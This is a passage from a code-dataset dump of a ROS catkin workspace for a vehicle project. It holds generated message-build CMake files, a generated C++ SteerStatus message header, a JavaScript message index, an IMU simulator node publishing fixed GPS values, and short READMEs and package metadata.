${PROJECT_NAME}_EXPORTED_TARGETS zf_msgs_generate_messages_lisp)\n\n### Section generating for lang: gennodejs\n### Generating Messages\n_generate_msg_nodejs(zf_msgs\n \"/home/zf/xuechong_ws/zhuifengShow0919/src/zf_msgs/msg/pos320.msg\"\n \"${MSG_I_FLAGS}\"\n \"/opt/ros/kinetic/share/std_msgs/cmake/../msg/Header.msg\"\n ${CATKIN_DEVEL_PREFIX}/${gennodejs_INSTALL_DIR}/zf_msgs\n)\n_generate_msg_nodejs(zf_msgs\n \"/home/zf/xuechong_ws/zhuifengShow0919/src/zf_msgs/msg/pose2dArray.msg\"\n 
\"${MSG_I_FLAGS}\"\n \"/opt/ros/kinetic/share/geometry_msgs/cmake/../msg/Pose2D.msg;/opt/ros/kinetic/share/std_msgs/cmake/../msg/Header.msg\"\n ${CATKIN_DEVEL_PREFIX}/${gennodejs_INSTALL_DIR}/zf_msgs\n)\n\n### Generating Services\n\n### Generating Module File\n_generate_module_nodejs(zf_msgs\n ${CATKIN_DEVEL_PREFIX}/${gennodejs_INSTALL_DIR}/zf_msgs\n \"${ALL_GEN_OUTPUT_FILES_nodejs}\"\n)\n\nadd_custom_target(zf_msgs_generate_messages_nodejs\n DEPENDS ${ALL_GEN_OUTPUT_FILES_nodejs}\n)\nadd_dependencies(zf_msgs_generate_messages zf_msgs_generate_messages_nodejs)\n\n# add dependencies to all check dependencies targets\nget_filename_component(_filename \"/home/zf/xuechong_ws/zhuifengShow0919/src/zf_msgs/msg/pos320.msg\" NAME_WE)\nadd_dependencies(zf_msgs_generate_messages_nodejs _zf_msgs_generate_messages_check_deps_${_filename})\nget_filename_component(_filename \"/home/zf/xuechong_ws/zhuifengShow0919/src/zf_msgs/msg/pose2dArray.msg\" NAME_WE)\nadd_dependencies(zf_msgs_generate_messages_nodejs _zf_msgs_generate_messages_check_deps_${_filename})\n\n# target for backward compatibility\nadd_custom_target(zf_msgs_gennodejs)\nadd_dependencies(zf_msgs_gennodejs zf_msgs_generate_messages_nodejs)\n\n# register target for catkin_package(EXPORTED_TARGETS)\nlist(APPEND ${PROJECT_NAME}_EXPORTED_TARGETS zf_msgs_generate_messages_nodejs)\n\n### Section generating for lang: genpy\n### Generating Messages\n_generate_msg_py(zf_msgs\n \"/home/zf/xuechong_ws/zhuifengShow0919/src/zf_msgs/msg/pos320.msg\"\n \"${MSG_I_FLAGS}\"\n \"/opt/ros/kinetic/share/std_msgs/cmake/../msg/Header.msg\"\n ${CATKIN_DEVEL_PREFIX}/${genpy_INSTALL_DIR}/zf_msgs\n)\n_generate_msg_py(zf_msgs\n \"/home/zf/xuechong_ws/zhuifengShow0919/src/zf_msgs/msg/pose2dArray.msg\"\n \"${MSG_I_FLAGS}\"\n \"/opt/ros/kinetic/share/geometry_msgs/cmake/../msg/Pose2D.msg;/opt/ros/kinetic/share/std_msgs/cmake/../msg/Header.msg\"\n ${CATKIN_DEVEL_PREFIX}/${genpy_INSTALL_DIR}/zf_msgs\n)\n\n### Generating Services\n\n### Generating Module File\n_generate_module_py(zf_msgs\n ${CATKIN_DEVEL_PREFIX}/${genpy_INSTALL_DIR}/zf_msgs\n \"${ALL_GEN_OUTPUT_FILES_py}\"\n)\n\nadd_custom_target(zf_msgs_generate_messages_py\n DEPENDS ${ALL_GEN_OUTPUT_FILES_py}\n)\nadd_dependencies(zf_msgs_generate_messages zf_msgs_generate_messages_py)\n\n# add dependencies to all check dependencies targets\nget_filename_component(_filename \"/home/zf/xuechong_ws/zhuifengShow0919/src/zf_msgs/msg/pos320.msg\" NAME_WE)\nadd_dependencies(zf_msgs_generate_messages_py _zf_msgs_generate_messages_check_deps_${_filename})\nget_filename_component(_filename \"/home/zf/xuechong_ws/zhuifengShow0919/src/zf_msgs/msg/pose2dArray.msg\" NAME_WE)\nadd_dependencies(zf_msgs_generate_messages_py _zf_msgs_generate_messages_check_deps_${_filename})\n\n# target for backward compatibility\nadd_custom_target(zf_msgs_genpy)\nadd_dependencies(zf_msgs_genpy zf_msgs_generate_messages_py)\n\n# register target for catkin_package(EXPORTED_TARGETS)\nlist(APPEND ${PROJECT_NAME}_EXPORTED_TARGETS zf_msgs_generate_messages_py)\n\n\n\nif(gencpp_INSTALL_DIR AND EXISTS ${CATKIN_DEVEL_PREFIX}/${gencpp_INSTALL_DIR}/zf_msgs)\n # install generated code\n install(\n DIRECTORY ${CATKIN_DEVEL_PREFIX}/${gencpp_INSTALL_DIR}/zf_msgs\n DESTINATION ${gencpp_INSTALL_DIR}\n )\nendif()\nif(TARGET std_msgs_generate_messages_cpp)\n add_dependencies(zf_msgs_generate_messages_cpp std_msgs_generate_messages_cpp)\nendif()\nif(TARGET geometry_msgs_generate_messages_cpp)\n add_dependencies(zf_msgs_generate_messages_cpp 
geometry_msgs_generate_messages_cpp)\nendif()\n\nif(geneus_INSTALL_DIR AND EXISTS ${CATKIN_DEVEL_PREFIX}/${geneus_INSTALL_DIR}/zf_msgs)\n # install generated code\n install(\n DIRECTORY ${CATKIN_DEVEL_PREFIX}/${geneus_INSTALL_DIR}/zf_msgs\n DESTINATION ${geneus_INSTALL_DIR}\n )\nendif()\nif(TARGET std_msgs_generate_messages_eus)\n add_dependencies(zf_msgs_generate_messages_eus std_msgs_generate_messages_eus)\nendif()\nif(TARGET geometry_msgs_generate_messages_eus)\n add_dependencies(zf_msgs_generate_messages_eus geometry_msgs_generate_messages_eus)\nendif()\n\nif(genlisp_INSTALL_DIR AND EXISTS ${CATKIN_DEVEL_PREFIX}/${genlisp_INSTALL_DIR}/zf_msgs)\n # install generated code\n install(\n DIRECTORY ${CATKIN_DEVEL_PREFIX}/${genlisp_INSTALL_DIR}/zf_msgs\n DESTINATION ${genlisp_INSTALL_DIR}\n )\nendif()\nif(TARGET std_msgs_generate_messages_lisp)\n add_dependencies(zf_msgs_generate_messages_lisp std_msgs_generate_messages_lisp)\nendif()\nif(TARGET geometry_msgs_generate_messages_lisp)\n add_dependencies(zf_msgs_generate_messages_lisp geometry_msgs_generate_messages_lisp)\nendif()\n\nif(gennodejs_INSTALL_DIR AND EXISTS ${CATKIN_DEVEL_PREFIX}/${gennodejs_INSTALL_DIR}/zf_msgs)\n # install generated code\n install(\n DIRECTORY ${CATKIN_DEVEL_PREFIX}/${gennodejs_INSTALL_DIR}/zf_msgs\n DESTINATION ${gennodejs_INSTALL_DIR}\n )\nendif()\nif(TARGET std_msgs_generate_messages_nodejs)\n add_dependencies(zf_msgs_generate_messages_nodejs std_msgs_generate_messages_nodejs)\nendif()\nif(TARGET geometry_msgs_generate_messages_nodejs)\n add_dependencies(zf_msgs_generate_messages_nodejs geometry_msgs_generate_messages_nodejs)\nendif()\n\nif(genpy_INSTALL_DIR AND EXISTS ${CATKIN_DEVEL_PREFIX}/${genpy_INSTALL_DIR}/zf_msgs)\n install(CODE \"execute_process(COMMAND \\\"/usr/bin/python\\\" -m compileall \\\"${CATKIN_DEVEL_PREFIX}/${genpy_INSTALL_DIR}/zf_msgs\\\")\")\n # install generated code\n install(\n DIRECTORY ${CATKIN_DEVEL_PREFIX}/${genpy_INSTALL_DIR}/zf_msgs\n DESTINATION ${genpy_INSTALL_DIR}\n )\nendif()\nif(TARGET std_msgs_generate_messages_py)\n add_dependencies(zf_msgs_generate_messages_py std_msgs_generate_messages_py)\nendif()\nif(TARGET geometry_msgs_generate_messages_py)\n add_dependencies(zf_msgs_generate_messages_py geometry_msgs_generate_messages_py)\nendif()\n"
},
{
"alpha_fraction": 0.7298969030380249,
"alphanum_fraction": 0.7298969030380249,
"avg_line_length": 27.47058868408203,
"blob_id": "05524508b1d5654538cf6073b08aff88eb4e190e",
"content_id": "67f2f2b93d1fe8a670ba961d713bfe8d2a1e2953",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 485,
"license_type": "no_license",
"max_line_length": 60,
"num_lines": 17,
"path": "/devel/share/gennodejs/ros/zfmsg/msg/_index.js",
"repo_name": "chouer19/zhuifengShow0919",
"src_encoding": "UTF-8",
"text": "\n\"use strict\";\n\nlet ThrottleGearStatus = require('./ThrottleGearStatus.js');\nlet BreakStatus = require('./BreakStatus.js');\nlet MotionCmd = require('./MotionCmd.js');\nlet CanInfo = require('./CanInfo.js');\nlet CanInfoAW = require('./CanInfoAW.js');\nlet SteerStatus = require('./SteerStatus.js');\n\nmodule.exports = {\n ThrottleGearStatus: ThrottleGearStatus,\n BreakStatus: BreakStatus,\n MotionCmd: MotionCmd,\n CanInfo: CanInfo,\n CanInfoAW: CanInfoAW,\n SteerStatus: SteerStatus,\n};\n"
},
{
"alpha_fraction": 0.6490867137908936,
"alphanum_fraction": 0.6641368865966797,
"avg_line_length": 25.99305534362793,
"blob_id": "d0e54c2e32d902c8436211086f2fa5143148868b",
"content_id": "a0ab5b856977aaa279c8b71cb33777790849662b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 7774,
"license_type": "no_license",
"max_line_length": 441,
"num_lines": 288,
"path": "/devel/include/zfmsg/SteerStatus.h",
"repo_name": "chouer19/zhuifengShow0919",
"src_encoding": "UTF-8",
"text": "// Generated by gencpp from file zfmsg/SteerStatus.msg\n// DO NOT EDIT!\n\n\n#ifndef ZFMSG_MESSAGE_STEERSTATUS_H\n#define ZFMSG_MESSAGE_STEERSTATUS_H\n\n\n#include <string>\n#include <vector>\n#include <map>\n\n#include <ros/types.h>\n#include <ros/serialization.h>\n#include <ros/builtin_message_traits.h>\n#include <ros/message_operations.h>\n\n#include <std_msgs/Header.h>\n\nnamespace zfmsg\n{\ntemplate <class ContainerAllocator>\nstruct SteerStatus_\n{\n typedef SteerStatus_<ContainerAllocator> Type;\n\n SteerStatus_()\n : header()\n , ts(0)\n , angle(0.0)\n , speed(0.0)\n , controlMode(0)\n , targetAngle(0.0)\n , targetSpeed(0.0)\n , torque(0.0)\n , motorCurrent(0.0)\n , errorCode(0) {\n }\n SteerStatus_(const ContainerAllocator& _alloc)\n : header(_alloc)\n , ts(0)\n , angle(0.0)\n , speed(0.0)\n , controlMode(0)\n , targetAngle(0.0)\n , targetSpeed(0.0)\n , torque(0.0)\n , motorCurrent(0.0)\n , errorCode(0) {\n (void)_alloc;\n }\n\n\n\n typedef ::std_msgs::Header_<ContainerAllocator> _header_type;\n _header_type header;\n\n typedef int64_t _ts_type;\n _ts_type ts;\n\n typedef float _angle_type;\n _angle_type angle;\n\n typedef float _speed_type;\n _speed_type speed;\n\n typedef uint8_t _controlMode_type;\n _controlMode_type controlMode;\n\n typedef float _targetAngle_type;\n _targetAngle_type targetAngle;\n\n typedef float _targetSpeed_type;\n _targetSpeed_type targetSpeed;\n\n typedef float _torque_type;\n _torque_type torque;\n\n typedef float _motorCurrent_type;\n _motorCurrent_type motorCurrent;\n\n typedef uint8_t _errorCode_type;\n _errorCode_type errorCode;\n\n\n\n\n\n typedef boost::shared_ptr< ::zfmsg::SteerStatus_<ContainerAllocator> > Ptr;\n typedef boost::shared_ptr< ::zfmsg::SteerStatus_<ContainerAllocator> const> ConstPtr;\n\n}; // struct SteerStatus_\n\ntypedef ::zfmsg::SteerStatus_<std::allocator<void> > SteerStatus;\n\ntypedef boost::shared_ptr< ::zfmsg::SteerStatus > SteerStatusPtr;\ntypedef boost::shared_ptr< ::zfmsg::SteerStatus const> SteerStatusConstPtr;\n\n// constants requiring out of line definition\n\n\n\ntemplate<typename ContainerAllocator>\nstd::ostream& operator<<(std::ostream& s, const ::zfmsg::SteerStatus_<ContainerAllocator> & v)\n{\nros::message_operations::Printer< ::zfmsg::SteerStatus_<ContainerAllocator> >::stream(s, \"\", v);\nreturn s;\n}\n\n} // namespace zfmsg\n\nnamespace ros\n{\nnamespace message_traits\n{\n\n\n\n// BOOLTRAITS {'IsFixedSize': False, 'IsMessage': True, 'HasHeader': True}\n// {'std_msgs': ['/opt/ros/kinetic/share/std_msgs/cmake/../msg'], 'zfmsg': ['/home/zf/xuechong_ws/zhuifengShow0919/src/zfmsg/msg']}\n\n// !!!!!!!!!!! 
['__class__', '__delattr__', '__dict__', '__doc__', '__eq__', '__format__', '__getattribute__', '__hash__', '__init__', '__module__', '__ne__', '__new__', '__reduce__', '__reduce_ex__', '__repr__', '__setattr__', '__sizeof__', '__str__', '__subclasshook__', '__weakref__', '_parsed_fields', 'constants', 'fields', 'full_name', 'has_header', 'header_present', 'names', 'package', 'parsed_fields', 'short_name', 'text', 'types']\n\n\n\n\ntemplate <class ContainerAllocator>\nstruct IsFixedSize< ::zfmsg::SteerStatus_<ContainerAllocator> >\n : FalseType\n { };\n\ntemplate <class ContainerAllocator>\nstruct IsFixedSize< ::zfmsg::SteerStatus_<ContainerAllocator> const>\n : FalseType\n { };\n\ntemplate <class ContainerAllocator>\nstruct IsMessage< ::zfmsg::SteerStatus_<ContainerAllocator> >\n : TrueType\n { };\n\ntemplate <class ContainerAllocator>\nstruct IsMessage< ::zfmsg::SteerStatus_<ContainerAllocator> const>\n : TrueType\n { };\n\ntemplate <class ContainerAllocator>\nstruct HasHeader< ::zfmsg::SteerStatus_<ContainerAllocator> >\n : TrueType\n { };\n\ntemplate <class ContainerAllocator>\nstruct HasHeader< ::zfmsg::SteerStatus_<ContainerAllocator> const>\n : TrueType\n { };\n\n\ntemplate<class ContainerAllocator>\nstruct MD5Sum< ::zfmsg::SteerStatus_<ContainerAllocator> >\n{\n static const char* value()\n {\n return \"09559d07e1ca45c09200d89a55db2635\";\n }\n\n static const char* value(const ::zfmsg::SteerStatus_<ContainerAllocator>&) { return value(); }\n static const uint64_t static_value1 = 0x09559d07e1ca45c0ULL;\n static const uint64_t static_value2 = 0x9200d89a55db2635ULL;\n};\n\ntemplate<class ContainerAllocator>\nstruct DataType< ::zfmsg::SteerStatus_<ContainerAllocator> >\n{\n static const char* value()\n {\n return \"zfmsg/SteerStatus\";\n }\n\n static const char* value(const ::zfmsg::SteerStatus_<ContainerAllocator>&) { return value(); }\n};\n\ntemplate<class ContainerAllocator>\nstruct Definition< ::zfmsg::SteerStatus_<ContainerAllocator> >\n{\n static const char* value()\n {\n return \"std_msgs/Header header\\n\\\nint64 ts\\n\\\nfloat32 angle\\n\\\nfloat32 speed\\n\\\nuint8 controlMode\\n\\\nfloat32 targetAngle\\n\\\nfloat32 targetSpeed\\n\\\nfloat32 torque\\n\\\nfloat32 motorCurrent\\n\\\nuint8 errorCode\\n\\\n\\n\\\n================================================================================\\n\\\nMSG: std_msgs/Header\\n\\\n# Standard metadata for higher-level stamped data types.\\n\\\n# This is generally used to communicate timestamped data \\n\\\n# in a particular coordinate frame.\\n\\\n# \\n\\\n# sequence ID: consecutively increasing ID \\n\\\nuint32 seq\\n\\\n#Two-integer timestamp that is expressed as:\\n\\\n# * stamp.sec: seconds (stamp_secs) since epoch (in Python the variable is called 'secs')\\n\\\n# * stamp.nsec: nanoseconds since stamp_secs (in Python the variable is called 'nsecs')\\n\\\n# time-handling sugar is provided by the client library\\n\\\ntime stamp\\n\\\n#Frame this data is associated with\\n\\\n# 0: no frame\\n\\\n# 1: global frame\\n\\\nstring frame_id\\n\\\n\";\n }\n\n static const char* value(const ::zfmsg::SteerStatus_<ContainerAllocator>&) { return value(); }\n};\n\n} // namespace message_traits\n} // namespace ros\n\nnamespace ros\n{\nnamespace serialization\n{\n\n template<class ContainerAllocator> struct Serializer< ::zfmsg::SteerStatus_<ContainerAllocator> >\n {\n template<typename Stream, typename T> inline static void allInOne(Stream& stream, T m)\n {\n stream.next(m.header);\n stream.next(m.ts);\n stream.next(m.angle);\n 
stream.next(m.speed);\n stream.next(m.controlMode);\n stream.next(m.targetAngle);\n stream.next(m.targetSpeed);\n stream.next(m.torque);\n stream.next(m.motorCurrent);\n stream.next(m.errorCode);\n }\n\n ROS_DECLARE_ALLINONE_SERIALIZER\n }; // struct SteerStatus_\n\n} // namespace serialization\n} // namespace ros\n\nnamespace ros\n{\nnamespace message_operations\n{\n\ntemplate<class ContainerAllocator>\nstruct Printer< ::zfmsg::SteerStatus_<ContainerAllocator> >\n{\n template<typename Stream> static void stream(Stream& s, const std::string& indent, const ::zfmsg::SteerStatus_<ContainerAllocator>& v)\n {\n s << indent << \"header: \";\n s << std::endl;\n Printer< ::std_msgs::Header_<ContainerAllocator> >::stream(s, indent + \" \", v.header);\n s << indent << \"ts: \";\n Printer<int64_t>::stream(s, indent + \" \", v.ts);\n s << indent << \"angle: \";\n Printer<float>::stream(s, indent + \" \", v.angle);\n s << indent << \"speed: \";\n Printer<float>::stream(s, indent + \" \", v.speed);\n s << indent << \"controlMode: \";\n Printer<uint8_t>::stream(s, indent + \" \", v.controlMode);\n s << indent << \"targetAngle: \";\n Printer<float>::stream(s, indent + \" \", v.targetAngle);\n s << indent << \"targetSpeed: \";\n Printer<float>::stream(s, indent + \" \", v.targetSpeed);\n s << indent << \"torque: \";\n Printer<float>::stream(s, indent + \" \", v.torque);\n s << indent << \"motorCurrent: \";\n Printer<float>::stream(s, indent + \" \", v.motorCurrent);\n s << indent << \"errorCode: \";\n Printer<uint8_t>::stream(s, indent + \" \", v.errorCode);\n }\n};\n\n} // namespace message_operations\n} // namespace ros\n\n#endif // ZFMSG_MESSAGE_STEERSTATUS_H\n"
},
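The SteerStatus_ template above is plain generated roscpp code: every field is a typedef'd POD and the default constructor zero-initializes them, so filling and publishing the message needs no extra machinery. A minimal sketch (node and topic names here are illustrative, not taken from this repository):

    #include <ros/ros.h>
    #include <zfmsg/SteerStatus.h>

    int main(int argc, char **argv)
    {
        ros::init(argc, argv, "steer_status_demo");   // hypothetical node name
        ros::NodeHandle n;
        // Hypothetical topic; the real topic name is not visible in this dump.
        ros::Publisher pub = n.advertise<zfmsg::SteerStatus>("steer_status", 10);

        ros::Rate rate(10);
        while (ros::ok())
        {
            zfmsg::SteerStatus msg;                   // fields default to zero
            msg.header.stamp = ros::Time::now();
            msg.ts = msg.header.stamp.toNSec();       // mirror the stamp into the int64 ts field
            msg.angle = 0.1f;                         // current steering angle
            msg.targetAngle = 0.2f;                   // commanded steering angle
            pub.publish(msg);
            rate.sleep();
        }
        return 0;
    }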
{
"alpha_fraction": 0.7321428656578064,
"alphanum_fraction": 0.7541208863258362,
"avg_line_length": 65.18181610107422,
"blob_id": "80130ad8cf40866157c3745c2471ecf906a5d3e4",
"content_id": "5f9be65a82ef5a657c83f0a74aa55389e31bd501",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 728,
"license_type": "no_license",
"max_line_length": 205,
"num_lines": 11,
"path": "/build/zf_msgs/cmake/zf_msgs-genmsg-context.py",
"repo_name": "chouer19/zhuifengShow0919",
"src_encoding": "UTF-8",
"text": "# generated from genmsg/cmake/pkg-genmsg.context.in\n\nmessages_str = \"/home/zf/xuechong_ws/zhuifengShow0919/src/zf_msgs/msg/pos320.msg;/home/zf/xuechong_ws/zhuifengShow0919/src/zf_msgs/msg/pose2dArray.msg\"\nservices_str = \"\"\npkg_name = \"zf_msgs\"\ndependencies_str = \"std_msgs;geometry_msgs\"\nlangs = \"gencpp;geneus;genlisp;gennodejs;genpy\"\ndep_include_paths_str = \"zf_msgs;/home/zf/xuechong_ws/zhuifengShow0919/src/zf_msgs/msg;std_msgs;/opt/ros/kinetic/share/std_msgs/cmake/../msg;geometry_msgs;/opt/ros/kinetic/share/geometry_msgs/cmake/../msg\"\nPYTHON_EXECUTABLE = \"/usr/bin/python\"\npackage_has_static_sources = '' == 'TRUE'\ngenmsg_check_deps_script = \"/opt/ros/kinetic/share/genmsg/cmake/../../../lib/genmsg/genmsg_check_deps.py\"\n"
},
{
"alpha_fraction": 0.7745097875595093,
"alphanum_fraction": 0.7941176295280457,
"avg_line_length": 50,
"blob_id": "5147971becb14c479f7a509d9107fe372bd08906",
"content_id": "d2644b46e256f3961f80f1fec343330ac0bf8d6d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "CMake",
"length_bytes": 204,
"license_type": "no_license",
"max_line_length": 85,
"num_lines": 4,
"path": "/devel/share/zf_msgs/cmake/zf_msgs-msg-paths.cmake",
"repo_name": "chouer19/zhuifengShow0919",
"src_encoding": "UTF-8",
"text": "# generated from genmsg/cmake/pkg-msg-paths.cmake.develspace.in\n\nset(zf_msgs_MSG_INCLUDE_DIRS \"/home/zf/xuechong_ws/zhuifengShow0919/src/zf_msgs/msg\")\nset(zf_msgs_MSG_DEPENDENCIES std_msgs;geometry_msgs)\n"
},
{
"alpha_fraction": 0.7411764860153198,
"alphanum_fraction": 0.8235294222831726,
"avg_line_length": 41,
"blob_id": "4c805fd73fb504197b17acec6d398aaa33d02342",
"content_id": "d91222ddfa2d09d00b77a80e812e58df3e1ed7c9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 85,
"license_type": "no_license",
"max_line_length": 54,
"num_lines": 2,
"path": "/src/zf_msgs/README.md",
"repo_name": "chouer19/zhuifengShow0919",
"src_encoding": "UTF-8",
"text": "\npos320.msg for imu of POS320\npose2dArray.msg for waypoints on car-perspective plane\n"
},
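The README lists pose2dArray.msg, but its body is not included in this dump; the generator calls earlier only show that it depends on geometry_msgs/Pose2D and std_msgs/Header. A sketch of building such a waypoint message, assuming the array field is named poses (an assumption — check the real .msg file):

    #include <ros/ros.h>
    #include <geometry_msgs/Pose2D.h>
    #include <zf_msgs/pose2dArray.h>

    // Build a short straight-ahead waypoint list in the car-perspective plane.
    zf_msgs::pose2dArray makeWaypoints()
    {
        zf_msgs::pose2dArray arr;
        arr.header.stamp = ros::Time::now();
        for (int i = 0; i < 5; ++i)
        {
            geometry_msgs::Pose2D p;
            p.x = 1.0 * i;            // metres ahead of the car (illustrative values)
            p.y = 0.0;
            p.theta = 0.0;
            arr.poses.push_back(p);   // field name `poses` is assumed, not confirmed by this dump
        }
        return arr;
    }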
{
"alpha_fraction": 0.7401130199432373,
"alphanum_fraction": 0.7796609997749329,
"avg_line_length": 34.400001525878906,
"blob_id": "fd8f9434e3dee3d7cd6e5cd51e83114390ebbb07",
"content_id": "c03579b3ca84931177fb8a74cdb59ff42be78cb4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "CMake",
"length_bytes": 354,
"license_type": "no_license",
"max_line_length": 69,
"num_lines": 10,
"path": "/build/pos320/CMakeFiles/driver.dir/cmake_clean.cmake",
"repo_name": "chouer19/zhuifengShow0919",
"src_encoding": "UTF-8",
"text": "file(REMOVE_RECURSE\n \"CMakeFiles/driver.dir/src/driver.cpp.o\"\n \"/home/zf/xuechong_ws/zhuifengShow0919/devel/lib/pos320/driver.pdb\"\n \"/home/zf/xuechong_ws/zhuifengShow0919/devel/lib/pos320/driver\"\n)\n\n# Per-language clean rules from dependency scanning.\nforeach(lang CXX)\n include(CMakeFiles/driver.dir/cmake_clean_${lang}.cmake OPTIONAL)\nendforeach()\n"
},
{
"alpha_fraction": 0.7841823101043701,
"alphanum_fraction": 0.788203775882721,
"avg_line_length": 28.84000015258789,
"blob_id": "e0f38889162334167bde9a473032db3246d4a54b",
"content_id": "1a943e228e51488623d88d851f4d38c80205f691",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "CMake",
"length_bytes": 746,
"license_type": "no_license",
"max_line_length": 100,
"num_lines": 25,
"path": "/src/steer/CMakeLists.txt",
"repo_name": "chouer19/zhuifengShow0919",
"src_encoding": "UTF-8",
"text": "# %Tag(FULLTEXT)%\ncmake_minimum_required(VERSION 2.8.3)\nproject(steer)\n\n## Find catkin and any catkin packages\nfind_package(catkin REQUIRED COMPONENTS roscpp rospy std_msgs nav_msgs geometry_msgs genmsg zf_msgs)\n\n## Declare ROS messages and services\n#add_message_files(FILES Num.msg)\n# add_service_files(FILES AddTwoInts.srv)\n\n## Generate added messages and services\ngenerate_messages(DEPENDENCIES std_msgs geometry_msgs zf_msgs)\n\n## Declare a catkin package\ncatkin_package()\n\n## Build talker and listener\ninclude_directories(include ${catkin_INCLUDE_DIRS})\n\nadd_executable(pure_pursuit src/pure_pursuit.cpp)\ntarget_link_libraries(pure_pursuit ${catkin_LIBRARIES})\nadd_dependencies(pure_pursuit steer_generate_messages_cpp)\n\n# %EndTag(FULLTEXT)%\n"
},
{
"alpha_fraction": 0.5931624174118042,
"alphanum_fraction": 0.6666666865348816,
"avg_line_length": 18.5,
"blob_id": "1af7f9447c5dfbc9e5980ed0f985908e543b200a",
"content_id": "1cdfc2a61f5ffc4757832b4c05656fd2a2a4d06d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1170,
"license_type": "no_license",
"max_line_length": 80,
"num_lines": 60,
"path": "/src/pos320/src/simulator.cpp",
"repo_name": "chouer19/zhuifengShow0919",
"src_encoding": "UTF-8",
"text": "#include \"ros/ros.h\"\n#include \"std_msgs/String.h\"\n\n#include \"zf_msgs/pos320.h\"\n\n#include <iostream>\n#include <sstream>\n\n#include <deque>\n#include <boost/bind.hpp>\n#include <boost/asio.hpp>\n#include <boost/asio/serial_port.hpp>\n#include <boost/thread.hpp>\n#include <boost/endian/arithmetic.hpp>\n#include <boost/asio.hpp>\n#include <boost/asio/serial_port.hpp>\n#include <boost/optional.hpp>\n\n\nusing namespace boost::endian;\n///using namespace Eigen;\n\nstruct Pos320Struct {\n little_uint8_t length;\n little_uint8_t mode;\n little_int16_t time1;\n little_int32_t time2;\n little_uint8_t num;\n};\n\n\nint main(int argc, char **argv)\n{\n ros::init(argc, argv, \"simulator\");\n\n ros::NodeHandle n;\n\n ros::Publisher pos320_pub = n.advertise<zf_msgs::pos320>(\"pos320_pose\", 1000);\n\n /// relative to frequency of pos320\n ros::Rate loop_rate(30);\n\n zf_msgs::pos320 pos320_data;\n\n int count = 0;\n while (ros::ok())\n {\n pos320_data.lat = 39.864323;\n pos320_data.lon = 116.179732;\n pos320_data.v_n = 0.8;\n pos320_data.v_e = 0.3;\n pos320_data.v_earth= 0.01;\n pos320_pub.publish(pos320_data);\n ros::spinOnce();\n\n loop_rate.sleep();\n }\n\n return 0;\n}\n"
},
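One thing the simulator above never does is stamp the header, so every published pos320 message carries a zero timestamp. If a downstream consumer orders or ages messages by header.stamp, the publish loop can be extended as below (a sketch, not code from the repository; the frame_id is hypothetical):

    // Inside the while (ros::ok()) loop, before pos320_pub.publish(pos320_data):
    pos320_data.header.stamp = ros::Time::now();   // wall-clock stamp for consumers
    pos320_data.header.frame_id = "pos320";        // hypothetical frame name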
{
"alpha_fraction": 0.6342412233352661,
"alphanum_fraction": 0.7159532904624939,
"avg_line_length": 22.363636016845703,
"blob_id": "e3ea3c9aa88c2e354f8e5a1a6f047d19d0b7c7f7",
"content_id": "e033f4e45feeadf793321ece8e1f79dfc8816166",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 257,
"license_type": "no_license",
"max_line_length": 53,
"num_lines": 11,
"path": "/src/pos320/README.md",
"repo_name": "chouer19/zhuifengShow0919",
"src_encoding": "UTF-8",
"text": "driver of POS320 imu, read from it and pub\n\nnode name is : read_pos320\n\npub topic: pos320_pose, content type :zf_msgs::pos320\n\n\nlive arguments \n serial port device , default is \"/dev/ttyUSB0\"\n loop_rate, default is 30\n baud_rate, default is 115200\n"
},
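Given the node, topic, and message type listed in this README, a minimal consumer of the driver's output is just a subscriber callback; the lat/lon/velocity field names match the generated zf_msgs/pos320.h shown further below (node name here is illustrative):

    #include <ros/ros.h>
    #include <zf_msgs/pos320.h>

    void poseCallback(const zf_msgs::pos320::ConstPtr& msg)
    {
        ROS_INFO("lat=%.6f lon=%.6f v_n=%.2f v_e=%.2f",
                 msg->lat, msg->lon, msg->v_n, msg->v_e);
    }

    int main(int argc, char **argv)
    {
        ros::init(argc, argv, "pos320_listener");   // hypothetical node name
        ros::NodeHandle n;
        ros::Subscriber sub = n.subscribe("pos320_pose", 100, poseCallback);
        ros::spin();                                 // hand control to the callback loop
        return 0;
    }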
{
"alpha_fraction": 0.7374045848846436,
"alphanum_fraction": 0.743511438369751,
"avg_line_length": 40,
"blob_id": "6dd2b332d24ac8eaa4f852c92da8050b99aa887b",
"content_id": "ea1caf836086315807cc8464e41b852efc8ec379",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "CMake",
"length_bytes": 655,
"license_type": "no_license",
"max_line_length": 91,
"num_lines": 16,
"path": "/build/zfmsg/catkin_generated/package.cmake",
"repo_name": "chouer19/zhuifengShow0919",
"src_encoding": "UTF-8",
"text": "set(_CATKIN_CURRENT_PACKAGE \"zfmsg\")\nset(zfmsg_VERSION \"0.0.0\")\nset(zfmsg_MAINTAINER \"an <[email protected]>\")\nset(zfmsg_PACKAGE_FORMAT \"2\")\nset(zfmsg_BUILD_DEPENDS \"roscpp\" \"std_msgs\" \"message_generation\")\nset(zfmsg_BUILD_EXPORT_DEPENDS \"roscpp\" \"std_msg\" \"message_generation\")\nset(zfmsg_BUILDTOOL_DEPENDS \"catkin\")\nset(zfmsg_BUILDTOOL_EXPORT_DEPENDS )\nset(zfmsg_EXEC_DEPENDS \"roscpp\" \"std_msgs\" \"message_runtime\")\nset(zfmsg_RUN_DEPENDS \"roscpp\" \"std_msgs\" \"message_runtime\" \"std_msg\" \"message_generation\")\nset(zfmsg_TEST_DEPENDS )\nset(zfmsg_DOC_DEPENDS )\nset(zfmsg_URL_WEBSITE \"\")\nset(zfmsg_URL_BUGTRACKER \"\")\nset(zfmsg_URL_REPOSITORY \"\")\nset(zfmsg_DEPRECATED \"\")"
},
{
"alpha_fraction": 0.5828320384025574,
"alphanum_fraction": 0.6155829429626465,
"avg_line_length": 24.297101974487305,
"blob_id": "b95740df8868cd7979006e81a7170a510ebb58e3",
